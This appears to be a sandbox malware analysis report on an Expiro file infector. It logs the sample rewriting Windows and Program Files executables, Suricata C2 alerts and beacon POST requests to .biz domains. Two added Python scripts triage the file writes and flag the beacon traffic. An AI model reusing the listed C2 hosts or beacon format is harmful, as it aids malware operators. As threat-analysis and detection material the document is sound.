                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\AgentService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 02A47394h7_2_02A47108
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 02A478DCh7_2_02A4767A
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h7_2_02A47E60
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h7_2_02A47E54
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 0592BCBDh17_2_0592BA40
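The "System file written" rows above are the file-infector pattern behind this report's "Infects executable files" signature: a process running from the user's Temp directory (and, in one row, an injected SysWOW64\svchost.exe) rewrites signed executables under Program Files and System32. The script below is an added example, not part of the Joe Sandbox report, that turns such rows into a triage summary. The line format is the one the report uses; the protected-root list, the user-writable markers, the three verdict levels and the SAMPLE_LINES (five copied from the rows above, one constructed control in which Firefox's own updater rewrites firefox.exe) are this example's own assumptions.

```python
"""Triage "System file written" report lines for executable infection.

Added example (not part of the Joe Sandbox report). The line format is the
one the report uses; PROTECTED_ROOTS, USER_WRITABLE_MARKERS, the verdict
levels and SAMPLE_LINES are this example's own assumptions.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Accepts both "Source: X | System file written: Y" and the fused form the
# report viewer exports ("...exeSystem file written: ...Jump to behavior").
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.*?)\s*\|?\s*System file written:\s*(?P<dst>.*?)"
    r"(?:\s*\|\s*)?(?:Jump to behavior)?\s*$"
)

# Directories where a user-mode dropper has no business rewriting executables.
PROTECTED_ROOTS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64",
                   r"C:\Program Files", r"C:\Program Files (x86)")
PE_SUFFIXES = {".exe", ".dll", ".sys"}
# Writer locations that point at a dropped payload rather than an installer.
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                         "\\users\\public\\")

# Constructed sample lines: the first five copy rows from this report (the
# fifth in the raw fused form), the sixth is a benign-looking control.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\msdtc.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe",
    r"Source: C:\Windows\SysWOW64\svchost.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior",
    r"Source: C:\Program Files\Mozilla Firefox\updater.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe",
]


def parse_line(line):
    """Return (writer, target) for a 'System file written' row, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m["src"].strip(), m["dst"].strip()


def in_protected_root(path):
    p = path.lower()
    return any(p.startswith(root.lower() + "\\") for root in PROTECTED_ROOTS)


def is_pe(path):
    return PureWindowsPath(path).suffix.lower() in PE_SUFFIXES


def from_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def verdict(src, dst):
    """'high': a PE in a protected directory rewritten by a process that runs
    from a user-writable location (the infector pattern in this report).
    'medium': same target class, but the writer lives elsewhere, e.g. the
    injected SysWOW64\\svchost.exe here or a legitimate updater; triage by
    Authenticode signer and hash. 'low': everything else."""
    if not (is_pe(dst) and in_protected_root(dst)):
        return "low"
    return "high" if from_user_writable(src) else "medium"


def summarize(lines):
    """Return {verdict: {writer: [targets]}} over every parsable line."""
    out = defaultdict(lambda: defaultdict(list))
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            src, dst = parsed
            out[verdict(src, dst)][src].append(dst)
    return {level: dict(writers) for level, writers in out.items()}


if __name__ == "__main__":
    for level, writers in summarize(SAMPLE_LINES).items():
        for writer, targets in writers.items():
            print(f"[{level}] {writer} -> {len(targets)} executable(s)")
            for target in targets:
                print(f"         {target}")
```

Every "high" target is a binary to pull from the host and compare against a clean install: a signed PE that has been rewritten no longer validates, so `Get-AuthenticodeSignature` on the listed paths, followed by a hash comparison, is the confirming check. The "medium" bucket is where legitimate updaters land, which is why it is separated rather than suppressed.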

                        Networking

                        Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:55575 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:59396 -> 172.234.222.138:80
                        Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:50357 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:51197 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:54147 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:59751 -> 18.208.156.248:80
                        Source: Network traffic | Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:54996 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:56257 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.5:56279 -> 1.1.1.1:53
                        Source: Malware configuration extractor | URLs: 212.162.149.53:2049
                        Source: unknown | DNS traffic detected: English language letter frequency does not match the domain names
                        Source: unknown | Network traffic detected: DNS query count 87
                        Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 212.162.149.53:2049
                        Source: global traffic | TCP traffic: 192.168.2.5:49711 -> 51.195.88.199:587
                        Source: unknown | DNS query: name: api.ipify.org
                        Source: unknown | DNS query: name: api.ipify.org
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49706
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49706
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49710
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49710
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:59392
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:59392
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:59491
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:59491
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:59498
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:59498
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:59538
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:59538
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:59550
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:59550
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:59592
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:59592
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:59599
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:59599
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:59724
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:59724
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.5:59752
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.5:59752
                        Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.5:59754
                        Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.5:59754
                        Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:59401
                        Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:59640
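The Suricata rows above already name the Expiro domains and the sinkholed hosts, and the "English language letter frequency does not match the domain names" finding plus the POST requests listed in this Networking section (random lowercase path, a .biz Host, one fixed User-Agent, a body of exactly 778 or 828 bytes) describe the beacon shape. The script below is an added example, not part of the Joe Sandbox report, that applies those two ideas to request heads and hostnames so the pattern can be matched where the ET rules are not deployed. EXPIRO_UA, the hosts and the two body sizes are copied from the request lines in this section; the parser, the letter-frequency table, the thresholds and SAMPLE_REQUESTS (three rebuilt from rows in this section plus one benign control) are this example's own assumptions.

```python
"""Classify HTTP request heads and score hostnames against the traffic in
this report.

Added example (not part of the Joe Sandbox report). EXPIRO_UA, the .biz
hosts and the 778/828 body sizes are copied from this section's request
lines; the thresholds, parser and SAMPLE_REQUESTS are this example's own.
"""
import math
import re

# Approximate English single-letter frequencies, in percent.
ENGLISH_FREQ = {
    "a": 8.17, "b": 1.49, "c": 2.78, "d": 4.25, "e": 12.70, "f": 2.23, "g": 2.02,
    "h": 6.09, "i": 6.97, "j": 0.15, "k": 0.77, "l": 4.03, "m": 2.41, "n": 6.75,
    "o": 7.51, "p": 1.93, "q": 0.10, "r": 5.99, "s": 6.33, "t": 9.06, "u": 2.76,
    "v": 0.98, "w": 2.36, "x": 0.15, "y": 1.97, "z": 0.07,
}
VOWELS = set("aeiou")

# Fixed User-Agent on every Expiro POST in the report: an old Chrome build
# dressed up with WeChat/QQBrowser tokens.
EXPIRO_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
EXPIRO_BODY_SIZES = {778, 828}                 # the only two Content-Length values seen
EXPIRO_PATH = re.compile(r"^/[a-z]{1,20}$")    # random lowercase path, no extension
IP_LOOKUP_HOSTS = {"api.ipify.org"}            # external-IP check seen before the C2 connect


def parse_request(raw):
    """Parse a request head ('METHOD /path HTTP/1.x' followed by header lines)."""
    lines = [ln.strip() for ln in raw.strip().splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def unigram_bits(label):
    """Mean -log2 P(letter) under English unigram frequencies: roughly 4 to 5
    bits for English-like labels, higher when rare letters (j, k, q, v, x, z) pile up."""
    letters = [c for c in label.lower() if c in ENGLISH_FREQ]
    if not letters:
        return 0.0
    return -sum(math.log2(ENGLISH_FREQ[c] / 100.0) for c in letters) / len(letters)


def max_consonant_run(label):
    """Longest run of consecutive consonants (y counted as a consonant)."""
    run = best = 0
    for c in label.lower():
        if c.isalpha() and c not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def looks_generated(host, bits_threshold=5.5, run_threshold=4):
    """Heuristic version of the report's 'letter frequency does not match'
    finding, applied to the registrable label ('przvgke' of przvgke.biz)."""
    parts = host.lower().split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    return unigram_bits(label) > bits_threshold or max_consonant_run(label) >= run_threshold


def classify(raw):
    """'expiro-beacon', 'ip-lookup' or 'other' for one request head."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "").lower()
    length = int(h["content-length"]) if h.get("content-length", "").isdigit() else -1
    if (req["method"] == "POST" and host.endswith(".biz")
            and EXPIRO_PATH.match(req["path"])
            and h.get("user-agent") == EXPIRO_UA
            and length in EXPIRO_BODY_SIZES):
        return "expiro-beacon"
    if req["method"] == "GET" and host in IP_LOOKUP_HOSTS:
        return "ip-lookup"
    return "other"


def beacon_hosts(raws):
    """Sorted C2 hosts from the requests classified as Expiro beacons."""
    return sorted({parse_request(r)["headers"]["host"].lower()
                   for r in raws if classify(r) == "expiro-beacon"})


# Constructed request heads: three rebuilt from rows in this section, one benign control.
SAMPLE_REQUESTS = [
    "POST /bimwjsl HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nHost: pywolwnvd.biz\r\nUser-Agent: " + EXPIRO_UA + "\r\n"
    "Content-Length: 828\r\n",
    "POST /vrnakrk HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Pragma: no-cache\r\nHost: ssbzmoy.biz\r\nUser-Agent: " + EXPIRO_UA + "\r\n"
    "Content-Length: 778\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) "
    "Gecko/20100101 Firefox/99.0\r\nHost: api.ipify.org\r\nConnection: Keep-Alive\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.0.1\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        host = parse_request(raw)["headers"]["host"]
        print(f"{classify(raw):14} {host:16} generated-looking={looks_generated(host)}")
```

The beacon fingerprint is the reliable part: it keys on values the sample hard-codes (the User-Agent and the two body sizes), so it catches hosts like fwiwk.biz that a short, common-letter label lets through the frequency test. The letter-frequency score is only a signal for hunting new domains of the same family and will flag some real words built from rare letters; the ipify lookup is classified separately because it is not a C2 contact in itself, only the external-IP check that precedes the connection to 212.162.149.53:2049.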
                        Source: global traffic | TCP traffic: 192.168.2.5:49711 -> 51.195.88.199:587
                        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: POST /bimwjsl HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /hmdy HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /p HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /vrnakrk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /ltaudf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /hadsfcqa HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /jsr HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /pkljfdj HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /qljrltdbsuxud HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /ioqv HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
                        Source: global traffic | HTTP traffic detected: POST /plvfcdbflq HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 828
                        Source: global traffic | HTTP traffic detected: POST /blqwxioreon HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 778
